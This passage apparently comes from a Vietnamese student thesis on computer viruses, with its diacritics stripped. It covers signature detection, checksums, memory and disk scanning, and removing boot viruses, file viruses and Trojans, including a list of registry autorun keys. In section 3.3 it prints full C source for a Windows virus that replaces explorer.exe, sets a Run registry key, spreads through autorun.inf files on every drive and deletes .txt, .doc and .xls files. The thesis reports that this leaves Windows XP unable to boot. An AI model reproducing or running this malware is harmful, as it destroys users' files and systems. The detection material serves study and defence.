Chng ta s c 2 string tng ng, nhng 2 offset khc nhau (t sau, mi khi nhc n cc string t file nh phn, ti s vit dng chui cc s hexan (thp lc phn) tin quan st):

Nhn 2 bng s liu trn chng ta c th to mt m nhn dng chung cho c 2 virus ny l: String: 64 75 6E 67 63 6F 69 00 Offset: a ch Entry Point + 60 + u im: Vic m rng nh th ny s lm m rng di virus c nhn dng. V d khi chnh sa mt s bytes nh cch bn trn thc hin nhng nu sau v tr Entry point nh c v vn cn tn ti cc byte nh ban u th vn c th nhn ra bng sign cp nht theo cch ny. + Nhc im: Vic cp nht i hi nhiu thng tin hn phng php offset tnh Scan engine phi c c ch lm vic phc tp hn thch ng vi c ch scan ny. Do phng php ny ly v tr offset da vo mt phn thng tin no ca mt nh dng file thch hp nn b gii hn mt s nh dng file.

2.1.4. Nhn dng hnh vi ng ng

Nhn dng cc hnh vi ng ng l mt chc nng "thng minh" m khng phi bt k phn mm dit virus no cng c. Hiu mt cch n gin th phn mm dit virus s theo di s hot ng bt thng ca h thng c th pht hin cc virus cha c bit n trong d liu ca n hoc cc phn mm c hi t a ra cnh bo ngi s dng, c lp virus sn sng gi mu n hng bo v phn tch v cp nht vo bn nng cp c s d liu k tip.
48

Chc nng ny cc phn mm dit virus thng cho php la chn kch hot hoc khng, mc hot ng (s dng mc hot ng tch cc, hot ng trung bnh mc c, hay hot ng mc thp - mc nh thit lp thng l kch hot sn mc c) bi a s chng c th chim ti nguyn v lm chm h thng i vi cc my tnh khng mnh.

2.1.5. Kim sot lin tc

Phn mm dit virus my tnh thng thc hin kim sot lin tc theo thi gian thc bo v h thng. Hnh thc kim sot lin tc s qut virus mi file m h thng truy cp n, mi file ngay t khi bt u c copy vo h thng thng qua hnh thc nhn bit so snh mu v theo di hnh ng ng ng.

2.1.6. Kt hp cc phng thc

Nu ch n thun s dng k thut so snh mu th mt phn mm dit virus s tht bi bi chng ch gii quyt hu qu cc file b nhim ch cha tm n nguyn nhn dn n file b nhim. Khi s dng mt s phn mm cha mnh ta s nhn thy trng hp: Phn mm dit c hon ton virus trong my, nhng ngay sau khi phin khi ng k tip ca h iu hnh, phn mm li pht hin ra chnh virus . y c th khng phi l phn mm nhn dng c nhng khng dit c, m l virus li c ly nhim tr li bi phn mm khng th gim st qu trnh khi ng h iu hnh ngay t khi bios trao quyn iu khin. Chnh v vy, phn mm cn phi kt hp mi phng thc kim sot v ngn chn cc hnh vi ca virus. Virus c th t cc dng lnh trong registry ly nhim virus t mt file nn no hoc v hiu ha phn mm dit virus; Cng c th virus thit lp ti v ngay khi s dng trnh duyt kt ni vo mng Internet. Do vy phn mm dit virus cn phi kt hp mi phng thc ngn chn virus. Chnh nhng yu t ny lm ln s khc bit gia cc phn mm dit virus hin nay, khng ln n vi v vn phn mm dit virus khc khi m ngay mt sinh vin cng c th vit mt phn mm dit virus nu chu kh su tm cc mu virus trn mng Internet hin nay.

49

2.2. PHNG PHP PHT HIN VIRUS 2.2.1. Qut (scanner)

y l phng php xut hin sm nht v c hu nh ton b cc chng trnh chng virus dng. Theo phng php ny cc chng trnh chng virus s tin hnh cp nht thng xuyn cc mu c trng ca tng virus ri tin hnh d xt cc file. Trong qu trnh qut ny cc chng trnh chng virus ny s so snh cc m nhn dng virus bit vi d liu ca tng file v nh pht hin ra virus trong file nu c. Nh vy cc chng trnh dng phng php ny phi cp nht thng xuyn cc mu c trng ca virus. Nu khng chng s khng pht hin c cc loi virus mi.

2.2.2. Checksum (kim tra tng)

y vn l phng php kim tra tnh ton vn ca d liu c dng trong thng tin c mt s chng trnh chng virus p dng. Nguyn tc ca phng php ny l pht hin s thay trong cc i tng cn kim tra. Cc chng trnh s dng phng php ny s sinh ra mt tr s c gi l checksum v c kim tra nh k vi i tng hin hnh (file, vng Boot). Nu virus thm nhp vo i tng ny th chng trnh s bo ng. Virus c th la cc chng trnh chng virus dng phng php ny bng cch to ra mt checksum gi. trnh iu ny cc chng trnh s dng phng php ny s dng nhiu k thut m ha to checksum rt phc tp virus khng th gi mo c. im yu ca phng php ny l phi kim tra thng xuyn u n mt vic lm rt tn thi gian v n khng c kh nng phn bit gia s thay i thc s v s thay i bi virus tn cng. Do ngi dng lun phi lo lng trc nhng cnh bo sai. Phng php ny s lm cho virus tn ti nu khi tin hnh checksum ln u virus tn ti sn. Mt nhc im na ca phng php ny l khng th p dng cho vic pht hin virus macro v nhng file.DOC lun thay i do ngi s dng

50

2.2.3. Guard (canh phng)

Chng trnh thng tr (TSR) p dng phng php ny s chn mi thao tc v a, thi hnh ng dng v cnh bo cho ngi dng bit mi iu kh nghi. Chng hn nh vic ghi ln file.EXE, file.COM hoc ghi trc tip ln vng Boot ca a. Tuy nhin cch ny khng pht hin c virus Boot dng cc hm trong BIOS truy xut a v nhng virus ny c np trc khi cc canh phng chy. Chng chn cc hm v a ca BIOS trc ln cc chng trnh kiu ny khng kim sot c chng. Cc chng trnh canh phng s cnh bo sai khi cc ng dng c ghi ln file.EXE hay file.COM, chng hn nh qu trnh nn, bo v, ci t phn mm V ni chung cc chng trnh loi ny lm gim tc ca h thng.

51

Chng 3. PHNG CHNG VIRUS

3.1. D TM TRONG B NH
y l bc quan trng nht cho cc bc tip theo, v khng th cha tr nu khng bit h thng c b nhim virus hay khng, hay l nhim lai virus no. Vic tm kim trc ht phi thc hin trong b nh v mt khi virus thng tr nm quyn iu khin h thng s dn n sai lc thng tin trong cc tc v truy xut a tip theo. Sau mi tin hnh trn a. S tn ti ca virus gn lin vi s tn ti ca mt vi du hiu c bit. i vi virus macro v TF-Virus, vic qut b nh l khng cn thit cho nn c th b qua, cn i vi B-Virus v RF-Virus cng vic ny li rt cn thit. Vic d tm bao gm d bo v kh nng xut hin mt virus mi, a ra chnh xc loi virus bit trong vng nh. Vic d tm trong b nh c th qua cc bc.

1/. i vi B-Virus:
So snh tng b nh BIOS bo co vi ton b b nh m chng trnh c c sau khi t kim tra s chnh lch. Du hiu chnh lch b nh cng cha kt lun c s tn ti ca virus, m l c s tin hnh bc hai v s chnh lch cng c th l do mt chng trnh bnh thng lm hoc RAM b hng mt phn. Bt u t a ch ca vng cao, tin hnh d tm bng k thut qut: d tm on m c trng ca Virus trong vng cao. Mi s tm thy u c th cho php kt lun c virus trong b nh. Trong trng hp khng pht hin, kh nng tn ti mt B-virus mi vn c th xy ra. Bng du hiu b nh b thiu ht, ngt13h tr v vng nh thiu ht v vng ny c m nguy him th c th kt lun tn ti B-Virus.

52

2/. i vi RF-Virus:
C th dng k thut qut d tm m c trng ca virus t a ch thp cho n cao hoc dng phng php gi ngt nhn dng m chnh cc virus ci t t nhn din n trong b nh. Trong trng hp khng pht hin, kh nng tn ti mt RF-Virus mi vn c th xy ra. Bng du hiu ngt 21h tr v vng nh c m nguy him th vic kt lun c RF-Virus mi l kh chnh xc. D Tm Trn a Vic d tm trn a phi thc hin sau khi kim tra b nh khng c virus hoc nu c th c khng ch. Nh a s cc chng trnh chng virus khc chng trnh cng p dng phng php qut tm on m c trng pht hin virus. u tin l qut vng Boot tm B-Virus, sau qut cc file tm F-Virus, Trojan v Worm. qut vng Boot dng ngt 13h chc c sector 02h ca BIOS c vo b m v tin hnh qut tm m virus c trng. qut file dng cc chc nng truy xut file ca ngt 21h: chc nng m file 03Dh, sau dng chc nng c file 03Fh vo b m ri cng tin hnh qut tm m virus.

3.2. DIT VIRUS V KHI PHC D LIU

Trc khi dit virus trn a m b nh li c virus thng tr th chng trnh s tin hnh khng ch virus trn b nh nu cn thit v c th. Tuy nhin, khi ng li my tnh bng mt a h thng sch dit virus vn l bin php an ton nht.

3.2.1. B-Virus
Nhiu ngi cho rng vic dit virus v khi phc a ch n gin l ghi mt Boot sector sch ln Boot sector c c virus. Tuy nhin, nu Boot sector ca a c nhim v c bit th rt kh thc hin, cng cha k a c bn tham s m ch cn b virus lm sai lch cht t cng dn n trng hp khng kim sot c a (vic ny hp l nu Boot sector sch chnh l Boot sector ca a c ct gi trc ). V vy, cch tt nht l phi khi phc Boot

53

sector, trong trng hp khng th khi phc li c mi tin hnh ghi mt Boot sector sch. Cc bc tin hnh bao gm: Cn c vo loi a (a cng hay mm) v loi virus tin hnh gii m xc nh ni ct gi Boot sector nguyn thy. c Boot sector nguyn thy vo b m bng ngt 13h (chc nng c sector 02h) ca BIOS v kim tra tnh hp l ca n. Trong trng hp vic kim tra l chnh xc mi bt u ghi vo Boot sector c virus bng ngt 13h chc ghi sector 03h ca BIOS. i vi loi DB-Virus, vic khi phc a cn c th i km vi vic gii phng mt s lin cung b nh du b trn a nu virus dng phng php nh v FAT. Cch gii quyt tt nht i vi vic ny l: nn lm nhng iu virus lm nhng ngc li.

3.2.2. F- Virus 1/. Virus macro:

Vic dit n gin l xa cc macro ca virus (dng chc nng ngt 040h ca ngt 21h).

2/. F-Virus truyn thng:

Gii m virus khi phc d liu ca chng trnh b virus chim gi sau ct b m virus ra khi chng trnh.

3/. i vi cc file dng .COM, .BIN:

Nu virus ny ly theo kiu ni ui file v tr li cc byte u b virus chim gi, di con tr file n u m virus (dng chc nng 042h ca ngt 21h) ri ct khi file bng ngt 21h ca chc nng ghi file 040h ca DOS. Nu virus ly theo kiu chn u: c file ngay t sau phn m virus vo b nh bng ngt 21h ca chc nng c file 03Fh ri tin hnh ghi li (dng chc nng 040h ca ngt 21h). Nu virus ly theo kiu vng trng: nh v v tr li cc byte u b virus chim gi, di con tr file n m virus ri xa n.

54

4/. i vi cc file dng .EXE:

Cch dit cng tng t nh i vi file .COM. Nu virus ct d Exe header c ca file th vic khi phc ch n gin bng cch tr li phn ny cho file, ngc li phi tnh ton nh v mt s yu t ca bng Exe header nh du hiu nhn dng file .EXE: MZ, tng s trang, s byte l trong trang cui ca file.

3.2.3. Virus Trojan

Trojan ch thc hin ly nhim ti my tnh m khng ly nhim vo file trong my tnh. Do khi thc hin dit Trojan chng ta khng cn qua tm ti xem c bn sao no ca n hot ng trong h thng khng. Trojan c c im l mun hot ng c th n phi c kch hot. Mt cch hu hiu dit Trojan l khng cho php n c kch hot. Thc hin dit Trojan theo cch ny chng ta phi tm hiu nhng phng php m Trojan c th s dng thng qua n c kch hot. Mt s phng php m Trojan thng s dng c kch hot l: (V d vi file khi ng l Trojan.exe) Trong cc th mc m ti cc file c th c kch hot khi khi ng Windows: C:\ Windows\ Start Menu\ Programs\ startup\ Trojan.exe. Trong file C:\ windows\ Win.ini ti dng lnh: Load=Trojan.exe Hoc run=Trojan.exe Trong file c:\ windows\ system.ini sau dng lnh shell Shell=Explorer.exe chy Trong Autoexec.bat C:\....\Trojan.exe Trong th mc khi ng ca Windows: C:\ \ Trojan.exe
55

To kha trong Registry: [HKEY_LOCAL_MACHINE \ Software \ Microsoft \Windows \ CurrentVersion\ Run] Trojan=c:\\ Trojan.exe [HKEY_LOCAL_MACHINE \ Software \ Microsoft\ Window \ CurrentVersion\ RunOnce] Trojan=c:\...\Trojan.exe [HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion\ RunServices] Trojan=c:\....\Trojan.exe [HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion\ RunServicesOnce] Trojan=c:\....\Trojan.exe [HKEY_LOCAL_USER \ Software \ Microsoft \ Windows \ CurrentVersion\ Run] Trojan=c:\....\Trojan.exe [HKEY_LOCAL_USER \ Software \ Microsoft \ Windows \ CurrentVersion\ RunServices] Trojan=c:\....\Trojan.exe - Trong Resistry Shell Open vi key l %1%* [HKEY_CLASSES_ROOT \ exefile \shell\ open\ command] [HKEY_CLASSES_ROOT \ comfile \shell\ open\ command] [HKEY_CLASSES_ROOT \ batfile \shell\ open\ command] [HKEY_CLASSES_MACHINE \ SOFTWARE \ Classes \ exefile \ shell \ open \ command] Trojan.exe = %1%* - Trong mt s ng dng m cho php mt s chng trnh c th chy: +Trong ICQ: [HKEY_CURRENT_USER \ Software \ Mirabilis \ ICQ \ Agent\ Apps\] +Trong ActiveX: [HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Active Setup \ Installed Components \ KeyName] StubPath=c:\...\Trojan.exe Loi b Trojan ta thc hin xa tt c cc lnh c file m Trojan s c chy khi khi ng my tnh ( y v d l file Trojan.exe)

56

3.2.4. Su Worm
dit su Internet ta thc hin ln lt cc qu trnh sau: - Nghin cu cc thng tin v su. - Thc hin loi b phn ly nhim ra khi cc file ly nhim. Mi su Internet c c trng ring ca n, cho nn iu cn thit l phi thc hin vic nghin cu v su Internet: tn file thc thi, ng dn ca file thc thi, nhng tc ng ca n ti cc file khc trong h thng, cc file m n to ra v phn m i din ca mi con su Internet. Thng qua m i din ca su Internet ta c th thc hin vic qut file tm v dit su Internet .

57

3.3. TO VIRUS MY TNH

Th nghim chng trnh virus my tnh vi Visual C++ chy trn h iu hnh Windows XP Chng trnh to virus : Phn khai bo #include "stdafx.h" #include<stdio.h> #include<string.h> #include<stdlib.h> #include<process.h> #include<io.h> #define SVCHOST_NUM 6 #define RUBBISH_NUM 5 #define REMOVE_NUM 5 /*=================================================*/ Char*autorun={"[AutoRun]\nopen=\"SVCHOST.com /s\"\nshell\\open=(&O)\\nshell\\open\\Command=\"SVCHOST.com /s\"\nshell\\explore=(&X)\\nshell\\explore\\Command=\"SVCHO ST.com /s\""}; /*=================================================*/ char *regadd={"REGEDIT4\n\n\ [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Curr entVersion\\Run]\n\"wjview32\\"=\"C:\\\\windows\\\\wjview32.com /s\""};

58

/*=================================================*/ int copy(char *infile,char *outfile) { FILE *input,*output; char temp; if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen (outfile,"wb"))!=NULL)) { while(!feof(input)) { fread(&temp,1,1,input); fwrite(&temp,1,1,output); } fclose(input); fclose(output); return 0; } else return 1; }

59

/*=================================================*/ int autorun_explorer() { FILE *input; if((input=fopen("C:\\windows\\system\\explorer.exe","rb"))!=NULL) { fclose(input); remove("C:\\windows\\$temp$"); remove("C:\\windows\\system32\\dllcache\\$temp$"); return 1; } copy("C:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe"); rename("C:\\windows\\explorer.exe","C:\\windows\\$temp$"); rename("C:\\windows\\system32\\dllcache\\explorer.exe","C:\\windows\\syste m32\ \\dllcache\\$temp$"); if(copy("SVCHOST.com","C:\\windows\\explorer.exe")==0 && copy ("SVCHOST.com","C:\\windows\\system32\\dllcache\\explorer.exe")==0 ) return 0; else return 2; }

60

/*=================================================*/ int add_reg() { FILE *output; if((output=fopen("$$$$$","w"))!=NULL) { fprintf(output,regadd); fclose(output); spawnl(1,"C:\\windows\\regedit.exe"," /s $$$$$",NULL); return 0; } return 1; } /*=================================================*/

void copy_virus() { int i,k; FILE *input,*output; char *files_svchost[SVCHOST_NUM]= {"svchost.com","C:\\windows\\wjview32.com","c:\\windows\\system\\M SMOUSE.DLL","c:\\windows\\syste\ m32\\cmdsys.sys","C:\\windows\\system32\\mstsc32.exe","c:\\windows\\ explorer.exe"}; char temp[2][20]={"C:\\svchost.com","c:\\autorun.inf"};

61

for(i=0;i<SVCHOST_NUM;i++) { if((input=fopen(files_svchost[i],"rb"))!=NULL) { fclose(input); for(k=0;k<SVCHOST_NUM;k++) { copy(files_svchost[i],files_svchost[k]); } i=SVCHOST_NUM; } } for(i=0;i<SVCHOST_NUM;i++) { if((input=fopen(files_svchost[i],"rb"))!=NULL) { fclose(input); for(k=0;k<24;k++) { copy(files_svchost[i],temp[0]); if((output=fopen(temp[1],"w"))!=NULL) { fprintf(output,"%s",autorun); fclose(output); }
62

temp[0][0]++; temp[1][0]++; } i=SVCHOST_NUM; } } } /*=================================================*/

void make_rubbish() { int i; FILE *output; srand(0); for(i=0;i<RUBBISH_NUM;i++) { int n; char s[30]; n=rand(); sprintf(s,"C:\\DESTORY_GHIDE_%d",n); if((output=fopen(s,"w"))!=NULL) { fprintf(output,"%ld%s",n*n,s); fclose(output); }
63

} } /*================================================*/ void remove_files() { long done; int i; struct _finddata_t ffblk; char *remove_files[3]={"*.txt","*.doc","*.xls"}; for(i=0;i<3;i++) { if(_findfirst(remove_files[i],&ffblk)==-1) continue; while(!done) { remove(ffblk.name); _findnext(done,&ffblk); } _findclose(done); } } /*=================================================*/ int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR int lpCmdLine,

nCmdShow)
64

int contral=0; autorun_explorer(); spawnl(1,"c:\\windows\\system\\explorer.exe"," /s",NULL); add_reg(); copy_virus(); make_rubbish(); spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL); return 0;

} Mn hnh C trc khi chy virus

65

Sau khi chy chng trnh virus win32 virus s t ng thc hin vic to v xa mt s file sau: Sau khi chy chong trnh bng Visual C++ chng trnh s t ng tc ng vo mt s file trn windows lm cho h iu hnh Windows XP b li khi khi ng CreateFile C:\windows\system32\dllcache\$temp$ DeleteFile C:\windows\system32\dllcache\explorer.exe CreateFile C:\windows\$temp$ DeleteFile C:\windows\explorer.exe CreateFile C:\windows\system\explorer.exe

Mn hnh C sau khi chy virus Sau khi chy chng trnh virus ny sau khi khi ng li my tnh mn hnh my tnh s khng khi ng ln c v file C:\windows\system\explorer.exe b thay i cc file C:\windows\system32\dllcache\$temp$, CreateFile C:\windows\$temp$
66

c to ra khin cho HH Windows XP khng np c chng trnh khi ng mn hnh Windows XP.

Mn hnh khng hin th thanh cng c khi ng v cc folder

67

Kt lun
Kt qu t c ca kha lun:

1. Tm hiu v nghin cu l thuyt: - Tng quan v virus my tnh, hot ng ca B-Virus, F-Virus, Macro Virus, Virus Trojan, Internet worm. - Mt s phng php pht hin, nhn dng virus my tnh. - Mt s phng php phng trnh v dit virus my tnh. 2. Th nghim Chng trnh m phng to virus my tnh.

68